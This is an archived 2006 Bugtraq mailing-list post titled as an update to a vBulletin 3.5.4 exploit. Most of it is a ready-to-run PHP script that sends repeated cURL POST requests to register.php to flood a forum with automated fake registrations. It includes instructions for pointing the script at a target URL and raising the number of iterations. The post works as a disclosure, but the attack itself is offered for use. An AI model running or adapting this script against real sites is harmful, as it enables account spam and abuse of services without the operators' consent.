[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060815010801.31332.qmail@securityfocus.com>
Date: 15 Aug 2006 01:08:01 -0000
From: dicomdk@...il.com
To: bugtraq@...urityfocus.com
Subject: UPDATE vBulletin Version 3.5.4 exploit
####################### vBulletin Version 3.5.4 #########################
Script : vBulletin Version 3.5.4
site : www.vbulletin.com
Exploit by : x-boy
E-mail : Dicomdk@...il.com
Type : Registration flood in register.php
Thanks to : Simo64
#########################################################################
Code of exploit (For english version , you can change it to other language)=> exploit.php
cURL Must be activated (http://curl.haxx.se)
Sorry for my bad English :-)
#########################################################################
<?
set_time_limit(60);
//You can change 10 to other numbers
for($i = 1 ; $i <= 10 ; $i++)
{
//to put curl to send POST request
$ch = curl_init();
//change http://localhost/vb3 to the url of the script
curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php');
curl_setopt($ch , CURLOPT_POST , 1) ;
curl_setopt($ch , CURLOPT_POSTFIELDS , 'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md5=&day=0&month=0&year=0&username=x-boy'.$i.'&password=elmehdi&passwordconfirm=elmehdi&email=dicomdk'.$i.'@...il.com&emailconfirm=dicomdk'.$i.'@...il.com&referrername=&timezoneoffset=(GMT -12:00) Eniwetok, Kwajalein&dst=DST corrections always on&options[showemail]=1');
curl_exec($ch);
curl_close($ch);
}
//Flood finished good luck
?>
##########################################################################
Powered by blists - more mailing lists